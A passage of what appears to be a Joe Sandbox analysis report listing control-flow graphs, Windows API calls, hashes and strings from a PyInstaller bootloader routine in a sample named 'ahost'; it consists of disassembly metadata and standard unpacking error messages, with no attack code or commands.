183->164 197 7ff7f91e3f2b-7ff7f91e3f3f call 7ff7f91e90c0 183->197 184->185 202 7ff7f91e4039-7ff7f91e405b call 7ff7f91e3670 call 7ff7f91e6fb0 call 7ff7f91e6d60 185->202 199 7ff7f91e3ef2-7ff7f91e3efc call 7ff7f91e8b30 189->199 200 7ff7f91e3e42-7ff7f91e3e48 189->200 193 7ff7f91e3e23-7ff7f91e3e2b 190->193 194 7ff7f91e3e2d-7ff7f91e3e2f 190->194 193->194 194->189 209 7ff7f91e3f64-7ff7f91e3fa7 call 7ff7f91e8b30 call 7ff7f91e8bd0 call 7ff7f91e6fb0 call 7ff7f91e6d60 call 7ff7f91e8ad0 197->209 210 7ff7f91e3f41-7ff7f91e3f5e PostMessageW GetMessageW 197->210 199->175 200->199 204 7ff7f91e3e4e-7ff7f91e3e54 200->204 207 7ff7f91e3e56-7ff7f91e3e58 204->207 208 7ff7f91e3e5f-7ff7f91e3e61 204->208 212 7ff7f91e3e67-7ff7f91e3e83 call 7ff7f91e6db0 call 7ff7f91e7330 207->212 213 7ff7f91e3e5a 207->213 208->175 208->212 248 7ff7f91e3fe9-7ff7f91e3ff7 call 7ff7f91e1900 209->248 249 7ff7f91e3fa9-7ff7f91e3fb3 call 7ff7f91e9200 209->249 210->209 228 7ff7f91e3e85-7ff7f91e3e8c 212->228 229 7ff7f91e3e8e-7ff7f91e3e95 212->229 213->175 231 7ff7f91e3edb-7ff7f91e3ef0 call 7ff7f91e2a50 call 7ff7f91e6fb0 call 7ff7f91e6d60 228->231 232 7ff7f91e3eaf-7ff7f91e3eb9 call 7ff7f91e71a0 229->232 233 7ff7f91e3e97-7ff7f91e3ea4 call 7ff7f91e6df0 229->233 231->175 243 7ff7f91e3ec4-7ff7f91e3ed2 call 7ff7f91e74e0 232->243 244 7ff7f91e3ebb-7ff7f91e3ec2 232->244 233->232 242 7ff7f91e3ea6-7ff7f91e3ead 233->242 242->231 243->175 256 7ff7f91e3ed4 243->256 244->231 248->164 249->248 259 7ff7f91e3fb5-7ff7f91e3fca 249->259 256->231 260 7ff7f91e3fe4 call 7ff7f91e2a50 259->260 261 7ff7f91e3fcc-7ff7f91e3fdf call 7ff7f91e2710 call 7ff7f91e1900 259->261 260->248 261->164
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: d02545141998fec8b25848ae1ed1df906e7abc4b971c3e4ab34b798fb2006b6e
                                                                                                                                                                                                                              • Instruction ID: 12aa85ab2cdde0f70342b0a0d965ed073491b76ac979dd2920709a4b0a1ace95
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d02545141998fec8b25848ae1ed1df906e7abc4b971c3e4ab34b798fb2006b6e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12328221E0868252FB69FF25AC542B9E671AF44780FC44032DA7D432DAEF2CF555C3A2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 465 7ff7f92069d4-7ff7f9206a47 call 7ff7f9206708 468 7ff7f9206a61-7ff7f9206a6b call 7ff7f91f8590 465->468 469 7ff7f9206a49-7ff7f9206a52 call 7ff7f91f4f58 465->469 475 7ff7f9206a86-7ff7f9206aef CreateFileW 468->475 476 7ff7f9206a6d-7ff7f9206a84 call 7ff7f91f4f58 call 7ff7f91f4f78 468->476 474 7ff7f9206a55-7ff7f9206a5c call 7ff7f91f4f78 469->474 489 7ff7f9206da2-7ff7f9206dc2 474->489 479 7ff7f9206af1-7ff7f9206af7 475->479 480 7ff7f9206b6c-7ff7f9206b77 GetFileType 475->480 476->474 481 7ff7f9206b39-7ff7f9206b67 GetLastError call 7ff7f91f4eec 479->481 482 7ff7f9206af9-7ff7f9206afd 479->482 484 7ff7f9206bca-7ff7f9206bd1 480->484 485 7ff7f9206b79-7ff7f9206bb4 GetLastError call 7ff7f91f4eec CloseHandle 480->485 481->474 482->481 487 7ff7f9206aff-7ff7f9206b37 CreateFileW 482->487 492 7ff7f9206bd3-7ff7f9206bd7 484->492 493 7ff7f9206bd9-7ff7f9206bdc 484->493 485->474 500 7ff7f9206bba-7ff7f9206bc5 call 7ff7f91f4f78 485->500 487->480 487->481 497 7ff7f9206be2-7ff7f9206c37 call 7ff7f91f84a8 492->497 493->497 498 7ff7f9206bde 493->498 503 7ff7f9206c56-7ff7f9206c87 call 7ff7f9206488 497->503 504 7ff7f9206c39-7ff7f9206c45 call 7ff7f9206910 497->504 498->497 500->474 511 7ff7f9206c8d-7ff7f9206ccf 503->511 512 7ff7f9206c89-7ff7f9206c8b 503->512 504->503 510 7ff7f9206c47 504->510 513 7ff7f9206c49-7ff7f9206c51 call 7ff7f91fab30 510->513 514 7ff7f9206cf1-7ff7f9206cfc 511->514 515 7ff7f9206cd1-7ff7f9206cd5 511->515 512->513 513->489 517 7ff7f9206d02-7ff7f9206d06 514->517 518 7ff7f9206da0 514->518 515->514 516 7ff7f9206cd7-7ff7f9206cec 515->516 516->514 517->518 520 7ff7f9206d0c-7ff7f9206d51 CloseHandle CreateFileW 517->520 518->489 522 7ff7f9206d86-7ff7f9206d9b 520->522 523 7ff7f9206d53-7ff7f9206d81 GetLastError call 7ff7f91f4eec call 7ff7f91f86d0 520->523 522->518 523->522
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction ID: ff76232cbed7a30bc7e6238ef5c919e726191a7b62a03495e9491e3e2f0634fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAC1AC32B28A4585FB50EF69D8902AC7771FB49B98B814335DA2E977E8DF38D051C390
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction ID: 25ffcb3d7ceb1a0c63f1bc185bbc53a57f859ebb0c3f1d7374ee1fd0df8b4536
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91F04422A1974187FBA0AF60BC4976AE360AB84764F840335DA7D426D8DF3CE0598A50

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 267 7ff7f91e1950-7ff7f91e198b call 7ff7f91e45b0 270 7ff7f91e1991-7ff7f91e19d1 call 7ff7f91e7f80 267->270 271 7ff7f91e1c4e-7ff7f91e1c72 call 7ff7f91ec5c0 267->271 276 7ff7f91e1c3b-7ff7f91e1c3e call 7ff7f91f00bc 270->276 277 7ff7f91e19d7-7ff7f91e19e7 call 7ff7f91f0744 270->277 281 7ff7f91e1c43-7ff7f91e1c4b 276->281 282 7ff7f91e1a08-7ff7f91e1a24 call 7ff7f91f040c 277->282 283 7ff7f91e19e9-7ff7f91e1a03 call 7ff7f91f4f78 call 7ff7f91e2910 277->283 281->271 289 7ff7f91e1a26-7ff7f91e1a40 call 7ff7f91f4f78 call 7ff7f91e2910 282->289 290 7ff7f91e1a45-7ff7f91e1a5a call 7ff7f91f4f98 282->290 283->276 289->276 296 7ff7f91e1a5c-7ff7f91e1a76 call 7ff7f91f4f78 call 7ff7f91e2910 290->296 297 7ff7f91e1a7b-7ff7f91e1afc call 7ff7f91e1c80 * 2 call 7ff7f91f0744 290->297 296->276 309 7ff7f91e1b01-7ff7f91e1b14 call 7ff7f91f4fb4 297->309 312 7ff7f91e1b16-7ff7f91e1b30 call 7ff7f91f4f78 call 7ff7f91e2910 309->312 313 7ff7f91e1b35-7ff7f91e1b4e call 7ff7f91f040c 309->313 312->276 319 7ff7f91e1b50-7ff7f91e1b6a call 7ff7f91f4f78 call 7ff7f91e2910 313->319 320 7ff7f91e1b6f-7ff7f91e1b8b call 7ff7f91f0180 313->320 319->276 326 7ff7f91e1b9e-7ff7f91e1bac 320->326 327 7ff7f91e1b8d-7ff7f91e1b99 call 7ff7f91e2710 320->327 326->276 330 7ff7f91e1bb2-7ff7f91e1bb9 326->330 327->276 333 7ff7f91e1bc1-7ff7f91e1bc7 330->333 334 7ff7f91e1be0-7ff7f91e1bef 333->334 335 7ff7f91e1bc9-7ff7f91e1bd6 333->335 334->334 336 7ff7f91e1bf1-7ff7f91e1bfa 334->336 335->336 337 7ff7f91e1c0f 336->337 338 7ff7f91e1bfc-7ff7f91e1bff 336->338 340 7ff7f91e1c11-7ff7f91e1c24 337->340 338->337 339 7ff7f91e1c01-7ff7f91e1c04 338->339 339->337 341 7ff7f91e1c06-7ff7f91e1c09 339->341 342 7ff7f91e1c26 340->342 343 7ff7f91e1c2d-7ff7f91e1c39 340->343 341->337 344 7ff7f91e1c0b-7ff7f91e1c0d 341->344 342->343 343->276 343->333 344->340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E7F80: _fread_nolock.LIBCMT ref: 00007FF7F91E802A
                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF7F91E1A1B
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F91E1B6A), ref: 00007FF7F91E295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
                                                                                                                                                                                                                              • Instruction ID: 595fa4c15704cc15ec1892222d3e6403c823762d84e9e687e1e3167b456afd6c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D816071E0868686FB60FF14E8502B9A3B0AF48744F844435DAAE877DDDE3CF54587A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: c22786fa0e0d9b249edca934909f20669ce2563e5725f3d93f71470edfc8a38e
                                                                                                                                                                                                                              • Instruction ID: e9e12ab08463cda390116e236c683fadd9e20ed62b8bef6d5921ca872d575994
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c22786fa0e0d9b249edca934909f20669ce2563e5725f3d93f71470edfc8a38e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C414021E0864686FB20FF21A8415B9A3A0AF45794FC44532EE6E477DDDE3CF5418BA1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 528 7ff7f91e1210-7ff7f91e126d call 7ff7f91ebdf0 531 7ff7f91e126f-7ff7f91e1296 call 7ff7f91e2710 528->531 532 7ff7f91e1297-7ff7f91e12af call 7ff7f91f4fb4 528->532 537 7ff7f91e12d4-7ff7f91e12e4 call 7ff7f91f4fb4 532->537 538 7ff7f91e12b1-7ff7f91e12cf call 7ff7f91f4f78 call 7ff7f91e2910 532->538 544 7ff7f91e12e6-7ff7f91e1304 call 7ff7f91f4f78 call 7ff7f91e2910 537->544 545 7ff7f91e1309-7ff7f91e131b 537->545 549 7ff7f91e1439-7ff7f91e146d call 7ff7f91ebad0 call 7ff7f91f4fa0 * 2 538->549 544->549 548 7ff7f91e1320-7ff7f91e133d call 7ff7f91f040c 545->548 554 7ff7f91e1342-7ff7f91e1345 548->554 555 7ff7f91e1431 554->555 556 7ff7f91e134b-7ff7f91e1355 call 7ff7f91f0180 554->556 555->549 556->555 564 7ff7f91e135b-7ff7f91e1367 556->564 566 7ff7f91e1370-7ff7f91e1398 call 7ff7f91ea230 564->566 569 7ff7f91e1416-7ff7f91e142c call 7ff7f91e2710 566->569 570 7ff7f91e139a-7ff7f91e139d 566->570 569->555 571 7ff7f91e139f-7ff7f91e13a9 570->571 572 7ff7f91e1411 570->572 574 7ff7f91e13d4-7ff7f91e13d7 571->574 575 7ff7f91e13ab-7ff7f91e13c1 call 7ff7f91f0b4c 571->575 572->569 576 7ff7f91e13ea-7ff7f91e13ef 574->576 577 7ff7f91e13d9-7ff7f91e13e7 call 7ff7f9209ea0 574->577 585 7ff7f91e13c3-7ff7f91e13cd call 7ff7f91f0180 575->585 586 7ff7f91e13cf-7ff7f91e13d2 575->586 576->566 580 7ff7f91e13f5-7ff7f91e13f8 576->580 577->576 583 7ff7f91e140c-7ff7f91e140f 580->583 584 7ff7f91e13fa-7ff7f91e13fd 580->584 583->555 584->569 587 7ff7f91e13ff-7ff7f91e1407 584->587 585->576 585->586 586->569 587->548
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: 3e3032e9574b13eb4f533a8bf58f2fd30dc85792962ca480065207ba416343bd
                                                                                                                                                                                                                              • Instruction ID: 8eb643ec19bcdea21e095f0314af4773546b0d5ad10ebdf1178a366905125921
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e3032e9574b13eb4f533a8bf58f2fd30dc85792962ca480065207ba416343bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE519122E0864282FB61BF15B8103BAA2A1AB85794FC44135EE6E477D9EF3CE5418791

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF7F91E3804), ref: 00007FF7F91E36E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E3804), ref: 00007FF7F91E36EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2C50: MessageBoxW.USER32 ref: 00007FF7F91E2D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction ID: 5a8add56418033b7c39bdd4b8d641fa12143a0809633e240a8bfd8e2d45399db
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA214FA1F1864242FB61BF24FC113BAA2B0BF44354FC04131D67D825EDEE2CE50583A5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 689 7ff7f91fbacc-7ff7f91fbaf2 690 7ff7f91fbaf4-7ff7f91fbb08 call 7ff7f91f4f58 call 7ff7f91f4f78 689->690 691 7ff7f91fbb0d-7ff7f91fbb11 689->691 705 7ff7f91fbefe 690->705 693 7ff7f91fbee7-7ff7f91fbef3 call 7ff7f91f4f58 call 7ff7f91f4f78 691->693 694 7ff7f91fbb17-7ff7f91fbb1e 691->694 712 7ff7f91fbef9 call 7ff7f91fa950 693->712 694->693 696 7ff7f91fbb24-7ff7f91fbb52 694->696 696->693 699 7ff7f91fbb58-7ff7f91fbb5f 696->699 702 7ff7f91fbb61-7ff7f91fbb73 call 7ff7f91f4f58 call 7ff7f91f4f78 699->702 703 7ff7f91fbb78-7ff7f91fbb7b 699->703 702->712 708 7ff7f91fbee3-7ff7f91fbee5 703->708 709 7ff7f91fbb81-7ff7f91fbb87 703->709 710 7ff7f91fbf01-7ff7f91fbf18 705->710 708->710 709->708 713 7ff7f91fbb8d-7ff7f91fbb90 709->713 712->705 713->702 714 7ff7f91fbb92-7ff7f91fbbb7 713->714 717 7ff7f91fbbea-7ff7f91fbbf1 714->717 718 7ff7f91fbbb9-7ff7f91fbbbb 714->718 722 7ff7f91fbbc6-7ff7f91fbbdd call 7ff7f91f4f58 call 7ff7f91f4f78 call 7ff7f91fa950 717->722 723 7ff7f91fbbf3-7ff7f91fbbff call 7ff7f91fd66c 717->723 720 7ff7f91fbbe2-7ff7f91fbbe8 718->720 721 7ff7f91fbbbd-7ff7f91fbbc4 718->721 725 7ff7f91fbc68-7ff7f91fbc7f 720->725 721->720 721->722 754 7ff7f91fbd70 722->754 730 7ff7f91fbc04-7ff7f91fbc1b call 7ff7f91fa9b8 * 2 723->730 728 7ff7f91fbc81-7ff7f91fbc89 725->728 729 7ff7f91fbcfa-7ff7f91fbd04 call 7ff7f920398c 725->729 728->729 733 7ff7f91fbc8b-7ff7f91fbc8d 728->733 741 7ff7f91fbd8e 729->741 742 7ff7f91fbd0a-7ff7f91fbd1f 729->742 750 7ff7f91fbc1d-7ff7f91fbc33 call 7ff7f91f4f78 call 7ff7f91f4f58 730->750 751 7ff7f91fbc38-7ff7f91fbc63 call 7ff7f91fc2f4 730->751 733->729 738 7ff7f91fbc8f-7ff7f91fbca5 733->738 738->729 743 7ff7f91fbca7-7ff7f91fbcb3 738->743 746 7ff7f91fbd93-7ff7f91fbdb3 ReadFile 741->746 742->741 748 7ff7f91fbd21-7ff7f91fbd33 GetConsoleMode 742->748 743->729 744 7ff7f91fbcb5-7ff7f91fbcb7 743->744 744->729 749 7ff7f91fbcb9-7ff7f91fbcd1 744->749 752 7ff7f91fbead-7ff7f91fbeb6 GetLastError 746->752 753 7ff7f91fbdb9-7ff7f91fbdc1 746->753 748->741 755 7ff7f91fbd35-7ff7f91fbd3d 748->755 749->729 757 7ff7f91fbcd3-7ff7f91fbcdf 749->757 750->754 751->725 762 7ff7f91fbed3-7ff7f91fbed6 752->762 763 7ff7f91fbeb8-7ff7f91fbece call 7ff7f91f4f78 call 7ff7f91f4f58 752->763 753->752 759 7ff7f91fbdc7 753->759 756 7ff7f91fbd73-7ff7f91fbd7d call 7ff7f91fa9b8 754->756 755->746 761 7ff7f91fbd3f-7ff7f91fbd61 ReadConsoleW 755->761 756->710 757->729 765 7ff7f91fbce1-7ff7f91fbce3 757->765 769 7ff7f91fbdce-7ff7f91fbde3 759->769 771 7ff7f91fbd63 GetLastError 761->771 772 7ff7f91fbd82-7ff7f91fbd8c 761->772 766 7ff7f91fbedc-7ff7f91fbede 762->766 767 7ff7f91fbd69-7ff7f91fbd6b call 7ff7f91f4eec 762->767 763->754 765->729 776 7ff7f91fbce5-7ff7f91fbcf5 765->776 766->756 767->754 769->756 778 7ff7f91fbde5-7ff7f91fbdf0 769->778 771->767 772->769 776->729 782 7ff7f91fbdf2-7ff7f91fbe0b call 7ff7f91fb6e4 778->782 783 7ff7f91fbe17-7ff7f91fbe1f 778->783 789 7ff7f91fbe10-7ff7f91fbe12 